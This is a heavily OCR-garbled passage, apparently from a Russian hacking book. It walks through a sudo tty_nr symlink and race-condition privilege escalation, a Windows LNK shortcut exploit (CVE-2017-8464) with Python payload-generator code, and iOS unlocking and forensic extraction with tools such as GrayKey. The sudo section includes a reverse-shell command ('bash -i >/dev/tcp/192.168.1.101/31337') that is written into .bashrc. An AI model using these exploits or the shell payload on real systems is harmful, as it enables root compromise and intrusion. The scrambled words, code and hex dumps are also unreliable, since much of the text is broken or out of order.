tty_nr (7) -

по лей у

находится

функция

tty _nr (рис.

Поле

1.3.

струк

эта
процеса

7номер

проблема

ttyname.c.

в файле
делат

стауе

Рис.

Саму

что

я влена
, что

информацю

поля

упомянл,

объ

от
строку

друга

пробелами.

(результа

По
работы

ним

функция

/proc/[pid]/stat)
для

а.

j 1src/ttyname.c
48 0 : get_process_ttyname (char *name , size t namelen)
481 :
490 :
491 :
4 92 :

/* Try to determine the tty from tty_nr in /proc/pid/stat. */
snprintf (path , sizeof(path) , " /proc/ %u/stat ", (unsigned int)getpid()) ;
if ( ( fp = fopen (path , " r " )) ! = NULL) (

13
□-

493 :
494:
495 :
496 :

! = ' \0 ' )

while ( *+ер
if (*ер=

')
= ' \0 ' ;
7) {
if (++field
dev_t tdev = strtonum(cp , INT_MIN ,
'

*ер

Тепрь

посм

от

няемог

фай

белы

рим

д

на

ла,

. Напри

ме

новым

поле

под

взятое

в

имен

Как

ви

строку

д ишь

,

по
ется.
може

те

п ерь,

то лам,
ход

на

по

если

пробе
Вы

отрим

Парсинг

что

Тепрь

коду

заложе

н

функци
ом

едлн

ую

ра

скопи

верног

номер

о пр

будет

7

н ое
з ра

иное

, ка

может

имя

испол­

содержать
р уем

про­

и

сохраним

его

cat\ wi t h\ space s

1.4).

проблему

п од

что

к оманду

(рис.

следуя

не
вполне

выполним

вызает пробелам

, используя

нарушить

он

&errstr) ;
,

cat,

результа

элемнто

и т,

ведь

бинарк

cat with spaces.

-

1.4.

А

INT_МAX

Это

2 (comm).
скоби.

стандрый

ем

Рис.

номер

круглые

р , возьме

/ p roc/ s e l f/stat и посм

да

□

len = getline(&line , &linesize , fp) ;
fclose(fp) ;
if (len 1 = - 1)
/* Field 7 is the tty dev (О if no tty) */

501 :
502 :
503 :
504 :
505 :

по

-

опредлния

tty_nr

get_process_ttyname, р
совем
не
tty_nr,

количеств

пробелв

ботчикам

лог

ик

в
у

ра

бот

азб

ивать

ка

ожи­

имен

ы

, мы
функци

get_process_ ttyname.
Как

можн

вы

з овем

цию
в

масиве

у прав

sudo чер

л я т ь

ез

имен

коман

симлнк

sudo_ttyname_dev
search devs .
для

с
поиска

д ы?

имен

Конеч

нес

./ 1,
у ществ

, при

то

помщи

симлнков!

Е сли

ую

get_process_ttyname
щего

tу-стройва

вы

з овет
с

l /src/ttyname.c
505 :

dev t tdev = strtonum(cp, INT_MIN ,

510 :

if (tdev > О)
{
errno = serrno ;
ret = sudo ttyname_dev(tdev , name , namelen) ;

511 :

512 :

INT_МAX

,

&errstr) ;

318 : sudo_ ttyname_dev(dev_t rdev , char *name , size t namelen)
319 : {

мы

номер

функ­

1

□-

-

14

□

/*
* First check sea r ch_devs for common tty devi ces .

326 :
327 :

*/

328 :
329 :
330 :
331 :

for (sd = search_ devs ; (devname = *s d)
len = strlen(devname) ;
if (devname[len - 1] == ' / ' ) {

14 7 : /*
148 : * Devices to search before doing

!= NULL; sd++)

breadth- first scan .
а

149 : */
150 : static char *search_devs[] = {
151 :
" /dev/console ",
152 :
" /dev/wscons ",
153 :
" /dev/pts/ ",
154 :
" /dev/vt/ ",
155 :
" /dev/term/ ",
156 :
" /dev/zcons/ ",
157 :
NULL
158 : };
Дале

выполнеи
редь,

вызает
щего
в

ширну

перходит

котрая

, в

sudo_ttyname_dev,
Эта

функция

продлжает
при

поиск

помщи

так

свою

оче­

несущтвю­
назывемог

поиска

/*
* Not found?

371 :
372:

ret = sudo_ttyname_scan(_ PATH_ DEV , rdev , false , name , namelen) ;
моент

мы

може

нуть

прогаме
войдя

в
в

виде

сотяние
своег

Дальше

в

вступаю

произвльный

тексов
успешно

устройв
е

в

выигра,

поиск

прохдит

аткующий

может
файлов

подсу­

ситем.

можн

работы

аткующий

может

Затем,

представиь

sudo в

изменть

любой

tу-стройв

файл

stderr. Используя

котре

результа

при

dup2

манипуляц

работы

с симлнка

команды,

файл,

открывае

помщи

котрая

Благодря

SELinux.
любог

Функция
, в

и

рамкх

содержим

суперользватю.

файл

sudo.

Когда

SHared Memory),

осбенти

stdin, stdout
мое

любое
и

принадлежщ
текущ

,

терминал.

игру

файлы,

запис

памяти

tty

relabel_tty
функци

уязвимость.

(общей

гонки

качеств

чая

breadth- first traversal of /dev/.

проэкслуативь

/dev/shm
устройве

в

а

Do

*/

это

в

черз

функци

369 :
370 :

В

в

к

sudo_ttyname_scan.
tty в катлоге
/dev/. Он
выполняетс
(breadth-first search, BFS).

вклю­

для

чтения

напрвляетс

содержи­

, можн

разешн

напрвить

на

исполне

и

□-

-

15

□

l/src/selinux.c
148 : relabel_tty(const char *ttyn , int ptyfd)
14 9 :
163 :

se_state . ttyfd = open(ttyn , O_RDWRIO_NOCTTYIO_NONBLOCK) ;

209 :
210 :
211 :

/* Re- open tty to get new label and reset std(in , out , err) */
close(se_state . ttyfd) ;
se_state . ttyfd = open(ttyn , O_RDWRIO_NOCTTYIO_NONBLOCK) ;

218 :
219 :

for (fd = STDIN_FILENO; fd /dev/tcp/192 . 168.1 . 101 /31337 0&1

''
Try ' sum --help ' to more infonnation .
Вы

вод

G,1ij

перданы

х

парметов

показн

на

рис

.

1.9.

□

C•ntOS7 • VMware Workstation 12 Play,r

Рис.

Приш

ло

время

собрать

1.9.

все

Вывод

воед

перданых

ино

парметов

и

з апустиь

с

новй

х

строки

эксплоит:

. /42183 sum $ '-- \ ' \nnohup bash - i >/dev/tcp/192 . 168 . 1 .1 01/31337 0&1 \ n '
В

ре
(рис

зультае

получаем
.

1.1 О)
.

изменый

файл

.bashrc, в
котрый

записля

наш

пейлоад

23
□-

~

C,nt0S7 - VМw

1.1О.

дело
ситему

щем

ул

за
споб

во

видеорлк

Рез

тольк
изящный

в

найдешь

□

a re \1/orkstat ion 12 Pfayer

Рис.

Дальше

-

йдет

е:

ьта

о

твоей

т

работы

эксплоита

повышения

фантзией:

-

что

получени

рутовы

и

привлегй

root. Увидеть
, ка
работе
эксплойт
https://vimeo.com/224623724.

в

каой

х

фай

-

без
вжиую

привлегй

л
ожи

х

писа

ть

дан

ия
, можн

. Я

уверн

, ты

моента
на

, к огда
следую­

......
-,;.НЕ

-□

Экс

2.
в

п л уа

тируем

ярлыках
aLLy К

Каждый

о мис

, кто

з начок

саро

дале

он

не ко

так

открывае

и

ка

с

змо

что

мож~т

такое

ярлык.

показться

жности

для

помщью

Однако

, и

при

аткующего.

Я

флешки

выполнять

это

опредл

пр

ны

х

раскжу

,

оиз

в ольн

ка

ы й

код

ситем.

Историчекй

эксур

Все

начлось

ещ

7
сий

и

тем,
Это

201 О

ло

испо

Когда
всталяи

Импакт

не
пак

апдейт

у

чилась

не
В

то

начле

ты

2015

. П осле

года

он

не

смог

­
заржл

на

е

машине,

в
вредо

код

котрый

весь

также

,

ко

­

н ос

­

срабтывл

указывл
это

на

ужас,

в

уязвимость.

Вот

иследовать

и

,

сетвую

ил

Microsoft

тольк

за

патч
даже

выкатил

в

видео

споб

его
на

патч
рыть

обхда
целвой

споб

ситем.

. Им

его

выпуст

и
и л и

п латк

п олу

­

марте

пакт

с

-

поря

этом

ком
н ие

MS15 -01 8,

тем

же

года

был

-

этог
од

н а к о

обнаруже

выполнеи

­

б ы ло

После

номер

2017
осталя

рабо­
провдимй

э ксплоита.

д ковым
июне В

при

Результаом

работы

уязвимость.

(M ichae l
Герклоц

обйти.

Zero Day lnitiative (ZDI),
тог
же
2015 года
иследова

демонстраци

следующий
зак

Михель

нашел

конферци

исправленя

полнстью
кода

на

немцкий

на

Имется

Microsoft

небзывст

автозпуск,

флешкой:

э ту

патч это

отче

опубликван.
и

тольк

Взглянув

изучл

в

с и с ­

ы лке.

, червь
. Если

функция

URL,

исправляет

детально
стал

НР

включена

в

удачной.

Герклоца
панией

компьютер
ярлык

однй

ксплоитм.

январ

Heerklotz)

с

код

.

котрый

чтобы

по

й

н ия
в

в е р­

Windows
ьны

перйти

флешку

вредонсый

эс

для
произвл

лишь

специальный

ограничвлся

MS 10-046,

сплоит

распотне варинто

, была

посещал

локаьную

из

создавл

носитель

льзовате

эк
н ить

всего

всталя
и

выполняс

этом при
по

было

один

кто-

и з билотек

всплы
выпол

чно

DLL,

потм
д

паблике

аткующем

ка

Stнxпe.

торую

в

ял

льзовася

вредонсый

если

звол

доста

ит

червя

ко

когда

по

пользватею

копируя
ный

году,

Эксплоит

э ксп
ног

в

ниже.

причем

вольнг

, ка
во

ярлык

знает,

прост

широке

«ядовитый»
целвой

хорш

Windows,

стрелкой

сделать

в

пользвася

со

условиях

редной

уязвимость

Microsoft Windows

Иван

на

опасную

Р

н

пр

оиз­

о че

­

25
□-

У звимя
Костер
я

ость
не

имет

наимеов

(Yorick Koster) и nixawk. Йорик

использую

на

СУ

по

религозным

Е-2017846,

-

□

также

а

написл

сображениям

первоначльый

сплоит

.

и

Найти

его

ты

РоС-

экспло

модуль

для

поэтму

в

сможешь,

ит
буд

загл

янув

же

опираться
в

nixawk (htps:/giub.comnxawklЫЬerCVE-2017
2017-8464.py).
Если

Йорик

Metasploit. MSF

обзре

к

репо

зито

-846/exp

хочешь

котрая

создали

прост

потригеь

запускет

уязвимость,

кальуятор

,

Зgstuden/CVE-2017846XP

то

можн

найти

. Теб

готвые

LNК-файлы

по

останея

сылке

лишь

скинуть

рий

loit_

CVE-

и DLL,
https://github.com/

их

на

флешку

.

Стенд
В

качеств

подытнг

алку

с

дится

кролиа

Windows 1х64. О
дизасемблр

. Не

Также

нам
в

для

При

теса

работе

с

будем

и
д ь

отладчик

я

ядра.

Вот

один

буд

использват

файлми

оригнальчт

понадбится каой-нибу

режим

у язвимост

б инарым
отла

из

нам

во

з ьме

д чик.

же

, приго­

IDA .

Я

решил

спобв

вирту­

, конеч
использват

настр

оить

WiпDbg
удален

ный

дебаги

нг

виртуалк.

Зап

устиь

1.

WinDbg.

NET
ния

от

нужо

Затем

указть

выпо
порт.

л нить

Его

отлаживемй

ситемы

давемых

даных

во

слушать

. Еще

время

сое

File I Kernel Debug.
команды

будет

прогам

можн

в

указть

д инея

(рис.

ключ

US B
Кеm1

вкладе

для

шифрованя

подключе­

пер­

х

1394

СОМ

Local

over the network
deЬugin

Port

Во

ни

2.1 ).

Kernel Debugging
NЕТ

ожида

NumЬer

jsoooo
jtime.to deЬug

----1

. 1Зi

ок

Рис

Включи

2.
утила

ть

режим

отладки

.

2.1.

Настройк

отладки

на

гостевй

Неlр

Cancel

машине.

ядра

по

сети

В

в

этом

WinDbg
нам

помжет

консльая

bcdedit:
bcdedit /debug on
bcdedit /dЬgsetin

net hostip : 127 . 0 . 0 . 1 port : 50000 key : time . to . debug . 1337

□где

\Р

hostip -

стройках

хост

вой

После

WinDbg.
(рис.

-

26

ОС,

port и
пер

заг р уз

□
порт

key ки

и

ключ,

виртуалк

котрые

она

по

т ы

дклю

у казл

чится

к

в

на­

отладчику

2.2).

,A~/~T~~d;~ •~

'~~~~:~~lG:h~r]~;tfR:~:f~:/E~:~/:·::-::~:

\ ~ t . J-t~I}, •tr~ ··~

)"R;>J1se~11.. ~h•s:1r ...

>e.&rct, P•t!- ,~

~t'.,ьa

ir.-1J••·--1,,.rst ..... \v6).,J1(:P'ЧI
• .,,1, ~- 1\(),,).0 . ....:~fre -s::_• • flst 1 ·,J1
кh1.,ы

м1

Ша.

: ..
ц,

1

FГlftц,<

1~;.i

Qo-ftffl!JI ~1,.;000 1>i~o,,.;!t'd"od,,;~,__;~: • t:,fff,'ftJI 9a•dv,•Xf.:19.!nt:;t,qt, $11.l
А\

pu s h

oou

Ра

c н_
е Ьк

са

p , ·01o

еа
(еЬр

обязательный
веная

-

обязательн

cs -

[ ebp •ai·g_ О
.

л ни

тельных

r_i:н,t)I

IН

•v

, н·

]

:_Rtt•tPf'1"Sp, 2Ch

mou

еах,

х

е
о,

д аных

nарсинг

,

ASCII

на

и / и л и

элемнта

они ци

IDList
клас

с

ни

к

сп

лоита.

Каждый

элемнт

сылаетя
и

читае

ярлык.

его

д аные

В

UTF-16 .

этой

Система

.

легитмно

Ты

ярлыке

их

м ожешь

также

наблюдть

на

чему.

метадныи

в

CLSID.

легитмно

ярлыке

Поиск

сотвеия

Наприме

эк

IDList
струкы

котрый

п ути.

нам

к

содержимг

ltemID

каждог

Бло

для

объекта

элемнту

2.9.

еах

LINKTARGET_IDLIST.
из

до

кодирве

нтифкаор

sec urity_c ookie

esp
ах,

re s p-+ 2Ch -+ uar Ji l,

для

и де

) +ЕО-1,р

urrrrrFl'8h

_

такому

НКEY_CLASROTID.

*,Uloнg

esp
еЬр,

пути

эксплуат

rxt· r ea 111

еЬр

sub

ние

часть

каждому

для

lщ>o si
short loc 101DCA18
еьх.
(edi:; OC4h ]
dwot· d ptt· ( еЬх
],
О
loc_101DCB45

: • . text: 1 D1DC9F8
. text: 1 01 DC9FE

еьх

:~;

с1р

jz

.text:101DCA01

:-~_,.

~ HR

~tt~~ ; S.HR f• ~tdD~-~-~-~-~:-~~-~kt .i.,;.t ()( ,х)_

а

tJ
IDд¼t:w-A

1m

D

JDAVlow-6

[Q]
н~х

iAJ

1k}

Vie'l\'~1

Li

Strux

jн1>рt•Ы

;

ф•f,t1

(.-,Ut1idDaBJockзgnRL0CKHFA

Xtif

О

сигнатуры

з вращется

SpecialFolderDataBlock
струке

svitch 12 cases

;

ОНfн

во

что

ПFГI\

OHh
еах,

!» lt o ,·t loc_63198F8S , jt1r1Pt 111
(1:IIYtll /'}
ds: ofr _63198FC,.(Pax•~) ; s ttitch j1Jlrlp

• f.OIH XRH:

прогамы
всего

srн

С"'Р

1 98F:

2.11.
.

IsValidDataBlock
Из

еах.

add

: 6З198F

. t•xt :6Э1
98F7~
. text :63198F77
• tex t : 63198F79

и

то

же

разме

Сам

и

т ип

з вания

2.1 2).
,
В

э то

KnowF

общая

дли
ld

e rDatВlock

ра зд на

ела.
­

□-

-

33

□

3

0 1
BlockSize
BlockSignature
SpecialFolderrD
Offset
Рис.

Затем
Следом

за
кой

из

мер

,
В

ВlockSignature

идет

специальны

х

ту:

па

ок

SpecialFolderDataBlock
раздел

сигнатур

раз

д ела.

блок

Ее

зна

SpecialFodrШ.

отнсия

чени

Он
ярлык

тоже

фиксрова­

ОхАВ.

. Их

спиок

ка

раз

указывет,

можн

к

посмтреь,

ка­

напри­

https://installmate.com/support/im9/using/symbols/functions/csidls.htm.
случае
объект
explorer.exe нахо
дитс
я в паке
Windows. Это

расмтивео

специальня

пак

ка лыка,

, котрая

показн

Разниц

с
вместо

Блоки

следут
BlockSignature 0xA000000S. В KnowFlderDatВck

но

2.12.

имет

на

рис

.

з начеи

KnownFolderDataBlock

целочиснг

представлния

~

Ох24

. Что

мы

и

наблюдем

в

в том,

что

там

используетя

полнцеый

·~

CSIDL_WINDOWS
Ох24

5.0

The \/ ✓ indows

directory or SYSROOT.

explorer.exe - Shortcut.1nk
Off3et (h)
00000180
00000190
00000lA0
00000180
00000lC0

Рис.

Рис

2.14.

В

струке

.

яр­
GUШ

2.14).
(рис.

~т

~

файле

2. 13 .

2.13. SpecialFolderlD
из

ярлыка

KnownFolderDataBlock

используетя

к файлу

explorer.exe

полнцеый

GUID

34
□-

Следующий

важный
мент

то

в

ШList.

смещни

Так

будет

~

Offset.

блок

блоке

ка

в

Это

-

□

смещни

нашем

в

ярлыке

задн

explorer.exe (рис.

у на казывть

байтх,

указы

вающе

на

эле

­

C:\Wiodows\explorer.exe,
путь

2.15).

explore:r.~e: · Shortcut.lnk

00 01 02 03 04 05 06 07 08 09

Of!set (h)

000 00000
00000010
000 000 20
00000030
00000040
00000050
00000060
00000070

LINКТARGET

0В
ОА
о

в
о

_IDLIST
69 10 А2 DЗ
ЗА
SC 00 on о
00 00 00 00 00
SE 10 00 5:7 69
00 Ef !.Е
FO '! В
15 ОА
00 00 00
00 00 00 00

4F DO 20
9D 19 00 2F Н
OQ QO 00 00 00
00 00 11 413 се
40 00 09 00 04
00 00 00 SD
2 Е
00 00 00 00

ЕА

1!:О

00000090
о

OD

ОА В ОС

З А

00
08 00

00 uo
56 00 31
61 6F
б Е
BD

з а

ОЕ

OF

Н

2В

],1

09 00 00

о ос

OOOOOODO
О

ЕО

OOOOOO FO
00000100
00000110
00000120
00000130
00000140
00000150
000001 60
00000170
00000180
000001 90
OOOOOlAO
OOOOOlBO
OOOOOlCO

Specialf QlderOataBlock
.с-

ps о о

АО

-~

2~ о о o

-1

j sз

2.15.

Бло

offset
к

струкы

указывет

струкы
(рис

~

offset
Рис.

Обраоткй

oql ~[о_

оо

заним

на

ае

тс

я

элемнт

ф ункция

SpecialFolderDataBlock
из
IDList

CShellLink:: _ DecodeSpecialFolder

2.16) .
.

г•
__ ___ !

•

• t1rм:DC9EI

.trм:1DC9EI

loc 1110CVEI:
-

tll!'St
Js
lll!'Ji

. tll!'xt:111 DC9E 2
• tr,ct: 111DC9Elt

• tf'xt: 111DC9EA

. trxt : 111DC9EB

---1··-

•

......

ds:_ir,ip_SHRf'•dD•tA8l oc kl1s t9') ; SHRt.>adOat.18]uckLj ia{x .х)
• si f,llX
f'S i . fSi
S hOl"'t loc_111DCA11

• tll!'xt: 111DC9EC
.t•xt : 111DC9F2
.trxt:111DC9Flt
. tll!'xt : 111 DC9 F6
.tll!'xt:111DC9FI

1

• .trxt:111DC9FE
. trxt:111 DCAl1
trxt : 111DCAl7
.t1txt:111DCAl7 loc 111DCAl7:
. trxt:111DCAl7
1 • .t1txt:111DCAl7
1
', - - , - - -., • t1txt :111DCA89
• t1txt : 111DCA•

,-.1. ..

1tsi. 1tsi

short loc 111DCA11
lt'1X, (•d
i;' EChИ
]

.

; СПОЕ
XR[f: CShel1Link : :_Lo KnownFolderDataB!ock
ptr [esi+ IIECh ]
; SHFindOataBlock( х
ds : _inpsнr·dDat!JlocJD_SZ

~мit.

C _ !_1;9,~-

-

ConuotPand ltf!rru.
0'%Syuf!n'IRoo1'%'u)'$tun3Z\~1'1tllJl,dll,·3B61
Ф%S~

~mRot

\osy

ШmJ2\5hdt3.lL-01

~ ""=G_DW~Ol!~--°"
l>
-~""---------i

JZ

"'"'
Shd!J'olп

IZ1

f ZS2D1-дЗlЯ9A.b4E8oOC

}

21f347DE.•-пю429.!87Q
7САЕ

2.19. Вторй
GUID
Рис.

Дальше

на
ется

оснве

треий

элемнт

д аног
в ШList

IDList
струкы

в

ярлыке-эспоит

.

21ЕС0-ЗА69AD8B3

в
. В

качеств
наш

аргумент
е м

с луч

пути
ае

DLL лежит

до
на

generate_ItemID (generate_cpl_applet (path )) ,
,

099 :
100 :

пер
э лемнт

119 :
Смотри

б468АВ.Я)

что это

за

функция

.

def generate_cp l_applet(path , name=name) :
name += Ь ' х О
'

билотек
диске

генриу­

D:.

□-

101 :
102 :
103 :
104 :
105:
106 :
107 :
108:
109:

path +=
Ь

' хО

-

38

□

'

= [
Ьindat
Ь

' х06а

',

struct . pack( ' Н ',
len(path)) ,
struct . pack( ' Н ',
len(name)) ,
path.encode( ' utf- 16 ' ) [2 : ] ,
name . encode( ' utf-16 ' ) [2 : ] ,
Ь " хО
"
# cormnent

110 :
Дальше

создаетя

секция

ExtraData.

generate_EXTRA_DATA()

213 :
Вот

ка

это

выглядит.

135 : def generate EXTRA_DATA() :
extra_data = [
Ь ' xl0x00x00x00 ',
Ь ' х05ОА
' ,

163 :
164 :
165 :
166:
167 :
168 :
169 :

0

Строка

166,

Ь

' х03

',

Ь

' х280

',

Ь ' хО
1

ка

мы
в

помни

,

ект

находится

это

CSIOL_CONTROLS, рис
[ЬЙ

# TERМINAL

это

-

специальной

паке.

a:_plortr.o:~. 5:hortcut.lnk:

!iJ

BLOCK

.

SpecialFolderIO,
И
эта
пак
2.20).

ОА
0В

ос

OOOOOODO

00
00
00
00
lF
30
08
00

00
00
00
00
50
9D
00
00
ЗА
00
6С
00
73 00

он

указывет

на

«Панель

то

46
00
00
00
ЕО
4F
14 00
2В
30
00 6А
5С
00
6С
00
6F 00

00
00
00
00

81
00
00
00
DO
2Е

30
00
74
00
66

00
00
00
00
20
80
9D
00
00
00
00

00
00
00
00
ЕА

00
00
00
00
ЗА

00
00
00
00
69

20
46
00
65
4D

20
00
00
00
00
ЕС

00
00
73
69

00
00
00
00
10
21
00
00
00
00

00
00
00
00

ос
со

00
00
00
70
08
ЗА
69
00 00
00 ОА
00 2Е
00 72
00 00

А2

00
00
00
00
DB

ЕА

00
ос

74
63
00

'

1

J

OD
00
00
00
00
00
00
10
00
00
00
00
ошв

О Е

00
00
00
00
14
2В
А2

00
44
64
6F

OF
00
00
00
00
00
30
DD
00
00
00
00

00 00

L .. .. ...... . А . . .
. . . FГ . .. .. . .....

................
.... ... ... .... ..
. . . •. . ... ... р .. .
. РаО
к:i.уШ
.. +О
.. . '!\

Ок

. .+

Ок

м!к

: i.уЭ

F

. ... .... .
. . . j . .. .. . . . .. D.

: . \ .t .e .s .t . . .d .
1 . 1 . .. м.i
. c . r . o .
s . o . f . t . ...... Q
; • • • • • • ••• ( ••• 1• •

00 00

~
I OL

_ CONТRLS

•
ОЮ(,~

Рис.

2.20.
Блок

...

---

t,;,;.,_~...,;c-~h,,,___ ~-

SpecialFolderlD

в

ярлыке-зсnоит

объ­
(Ох03

~

CS

, что

управления»

tt.st,lnk

Offset (h) 00 01 02 03 04 05 06 07 08 09 О А 0В
00000000 4С
00 00 00 01 14 02 00 00 00 00 00
00000010
0000 0020
00000030
000000 40
00000050
00000060
00000070
00000080
00000090

и

>:/'А

39
□-

В

строке

находится

167

Оно

считае

объекта

я отнсиель

элем

н т,

(рис

смещни

.

а

д

ним

идут

Так

два

□

в

ШList.

пер

-

байтх,

ка

элемнт

указывюще

за
а

по

путь

билотек до

О х14

байт

на

нашу

DLL.

отвеча
, то

треий

смещни

равн

о

Ох28

2.21 ).
HxD - [D:\VisualHack\ test.lnk]
т

file fdit ~earch j{iew Analysis ~ras ~ indow

Г1С:

.ц')

~

explorer.exe - Shortcut.lnk
O

f

з

~il
L...J I

00000000
00000010
000000 2 0
000000 3 0
000000 40
0000 0 05 0

hex

test.lnk

00 01 0 2 03 04 05 06 07 03 0 9

(h)
et

I

ANSI

О А

ОВ

OD
ос

OF
ОЕ

00 00 00 L . ..... .. . . . А ...
. . . Ft .... ... ....
00 00 00 00
00 0 0 0 0 00
00
70
item 1 . ... .. р . ..
.,i
. уШ
.. + о
03
69
О к .. . Ъ
м ! к : i.уЭ
ос
item 2
.. + О ОкF
. .... . ...
00
OOuuuu i, u 00 00
. . . j .. . .. . . . .. D .
О А
00 44
.
000000 9 0 % А 00 sc
... d .
- - ; -, 6

и

ШList

дой

най

ем

д ен

д о

бл

ф у нкци

Specialок

2.23).

0 !!5~t (h)

ЗА

на

г~ntS

.z::8d ,
rdz ,

1 11\QV

Z l ea
3. .l e a

с:,

f,'
< !DOCTYPE plist PUBLIC "- //Apple//DTD PLIST 1 . 0//EN "
"http : //www . apple . com/DTDs/PropertyList - l . 0 . dtd">


< .. . >
UniqueDeviceID
Oa226c3b263e004a76e6199c43c4072ca7c64a59


Срок

жи
сти

зн

неи

и

файлов

lockdwп

з вестн.

в

iOS 1 1 и

Эксперимнтальо

подключаись

к

повтрнг

довер

ном

у

установлеия

сработь

боле

новых

удалось

компьютеру

дове

версиях

ограниче

установиь,

что

дольше

реных

двух

отншеий

и

устройва,

месяцв,

, так

в точн­

котрые

не

иногда

что

старые

требую

файлы

могут

не

.
Возвращемся

с

эскалцию
с

взлома

чуть
к

больше

просмтеь

в

для

вателя

лик

шанс

на

то

включения.

Это
поль

,

вла

зовательскму

в

журналм

телфон
создания

,

котрый

шь

п олучить,

,

если
и л и

нове

ка

и

, чем

у
л и цу.

iOS

использват

освещн

iOS

пальц

ища

очень
ц

возмж­

7 . х)

iOS

тебя

ест

Тогда

ь

ты

.

доступ

сможешь

keycl1ai11 .

и

многе.

означет

т. е.

хотя

до

установлеым

включен,

бы

то

ступа

р аз

к за

с

ве­

моента

шифрованму

приложеням

и

их

да

ным

,

ругом.

з блокирван
копий

ройств

наличе
к

д

iPh o11e
Если

уст

,

ра

очень

разблокив

многу

был
резвных

ит

делу

не

. Для

ил

выключен?

очердь
и

даные
,

управленим

ч атку

хранил

ил

дел

свою
раз

ситемны

сможе

выполнить

iOS версий

ства

комплеса

отпе

н ог

устрой

позвляет

блокирв

под

iPhone

его

завис

ч то

,

из

вести код

документаци

любых

-

вещи

извлечь

ил

моент

iPhone
простй

чего

потребуся

и з локаь

В ключен

служба

от
к дао

iDC-4501
iPhone одп
управленим
комплес

ты

зо

пароли

такой

Закупленый

разблокивнм

информац
поль

От

СК.

, после
,

пас

биометрк

В

с

на

1О.
по
11 .1.2 включитеьно
11.0-11 .1.2, возмжн
файл
lockdown (эт
ность

Еще

истор

привлегй

хотя
, есть

возмжнсть

бы

ра
пол

з,

работю
у чи

сервиы
те ь

да

ные

AFC,
, к

кот-

158
□-

рым

приложеня

открыли

этог

даже
точн

не

доступ.

придется

же

таког

нет,

Итак,

если

теб

можешь

в

ил

можн

руки

Подключить

поал

не

к

и

пове

прошл

зло:

компьютеру.

Если

с

редь,

теб

USB,

не
, ни

даных.

2.

I nfonnation. Даже
ты

серийны

сможешь

номер
из

iOS
теб

будт

доступны

перво,

ил

помщи
всегда

сделать,

доверных

этог

отншеий

модели,

телфон

а
от

спобы

по­

для

идентфкаор

зависмот

иные

пер­

сохранеим
использ­

нужо

iOS, точный
. В

те

ни
с

телфон

что

, номер

SIМ-карту)

код

.

установлеия

и , возмжн
вынули

подбрать

Elcomsoft iOS Forensic Toolkit

версию

устройва

телфона

оче­

при

Наконец,

без

узнать

реак­

первую

можн

блокирв
то

стал

ограничея

телфон

у,

В

разблоки­
и

режим

котрг

ограниче).

компьютер

устройве.

в

течни

код

к

команд

компьютер
если

,

об

раз

разблокивть

правильный

дключися

информацю
с

ил

, в

разблокив

новая бле

lockdown, ни
Cellebrite. Не
помжет
recovery mode
черз

время

, ведя

служит

файлом

ниже;

устройва,

последний

першл

GrayKey

них-

для

по

кода

з оваться

видт

USB Restricted Mode
блокирв
- в

телфон

возмжнсть

телфон

в

прошивк
(о

собщени
не

iOS 11.4.1 ил

взлома

, если

сервио

разблокивть

Если

ты

появилсь

пользвате

востанлеи

биометрку

лучить

Увы

воспль

Единствеая

можн

телфон

назвие
для

помщи

Face ID, Touch ID
вать

когда

ни

даже

экраном,

совершн

имет

Cellebrite.

при
загрук

датчиком

заблокирвным

работе

сервио

и

с

на

компьютер

устройве

режим

удастя

блокирв

а

моента,

Это

Apple на появлени
GrayKey
цией

, на

час

устройв.

пользвате­
телфон

iPhone

вероятн

больше

ровал

компьютера

Ш.

включеный

Unlock iPhone to use accessories,
теб то

всего
доста­

следующ.

телфон

1.

из
разблокивть

Face

с делать

Дr~я
удаче

извлечным

поытаься

лица сканером

порбвать

фотграи.

опредлнйи

lockdown,

файл

Touch ID
отпечак

извлечь

телфон:

файлом

Если

□

, можн

разблокивть

воспльзатя
ля.

Наконец

-

пользватея

(даже

установлей

верси

добраться

до

пользватеских

даных.

3.
Если

телфон
с

подключися
пользватея

можн

поытаься

лефон

не

придется!
то

теб

об
А

его

резвную

вот

что,

если

Если
код

руках

у

тебя

ка

не

был

класичей
том

если

мину

файл

, если

дей­

расшиеную

ин­

хотя
хотя

бэкап

фай­
те­

писал;

разблокивн

он

черный

бы

бы

раз

после

единожы

после

получится

извлечь

и

приложенй,

и

установле,

кирпч

iPhone,
в

этог
разблокивть

ме­

свежую

сброить

не

блокирв).

выключенй
. Дело

уже

разблокивн

на
код

помщи

-

мы

lockdown
файл

При
копию

lockdown
crash logs, и файлы

журнал

н ужен

есть

файл

пароль тольк

этог

требуся
блокирв

, и

(вот

на

взломать

помщи

руках

повезл.

телфона

был

видео)

копию
для

из

iPhone
при

на

lockdown

телфон

, то

тебя

теб

файлх

извлечь
если

у

резвную

( если

и

получится

нать

удастя

включи

( фот

, что

, о

устройве

включения).
диафйлы

считай
свежую

Впрочем

формацию
ка

а

создать

ствующий,

тог,

компьютеру,

-

компьютера

ла

Но

к

, раздел что

пользватеских

теб

так

без
ил

признаков
иначе

жизн?
потребуся

д аных

уз

iPhone

­
за-

159
□-

ш

и ф р ован,

а

ключа

и

Даже

дан

у п ра

в леним

шифрованя

ты

пароля

кая
,
к

же

у

сможешь

не

версия

тебя

каих

руках

бло

Вот
нут?

и
А

за

до

сутки?

А

телфон

в

?

бы
ты

но

Restгicd

дот

к.

эт

их

весьма

благо­

ил

услгами

Скорст

ь

блокирв

можн

пер­

подб­

цифровых

Дальше

будет кодв

скорть

пербоа

iOS (до
1 1.4) и
iOS 11.4 (неважо,
(неважо

резко

сни­

делю,

телфон

т . е.

был
Во

ли
час

к
эт

их

цифровму

случаях

цифровые

шестизначый

телфон,

меньш прол

подключен

всех

з начые

а

разблокився

ли

ил

четырх

не

не
разблокився

активролся

йства

медлной:

за

телфон

, разблокився

блокирву).

скорть
коды

цифровй

блокирв

код

можн

перби­

лет.

iOS 11.4. 1 ил
Увы,

что

телфон

правильный

код
ка

не

(если

боле

единство,

разблокивть

поытк

разблокився

шестизначых

версия

вратиь

очень

порбвать
сти

телфон

д

не­
возмж­

и.

и . В

ко

ми­

ировк

GrayKey

то

версия

устро

3. аН
телфон
запущен
Restricted Mode.

удастя,

и

] 1.4)

я ть

все

загрук

пербоа

разблокив
будет

блок

органы).

поы

, либо

взломаны быть

(до

начльой

iOS 11.4. 1 и выше
Mode не
пре

код

дев

Secure Enclave.

версия

чтобы

за

сложнт

воспльзатя

старя

USB

двух до

моента

тысяч

включения

режим

могут

подключить

, а

возрастния

iOS

, а скорть

300

после

пербоа

USB
и

. Расмотри

цифровй

защит

,

рать

час

сработе

последнй

порядке

сможешь

запущен

адптеру

черз
устройве

iPlюne

правохнительы

первых

, либо
с

в
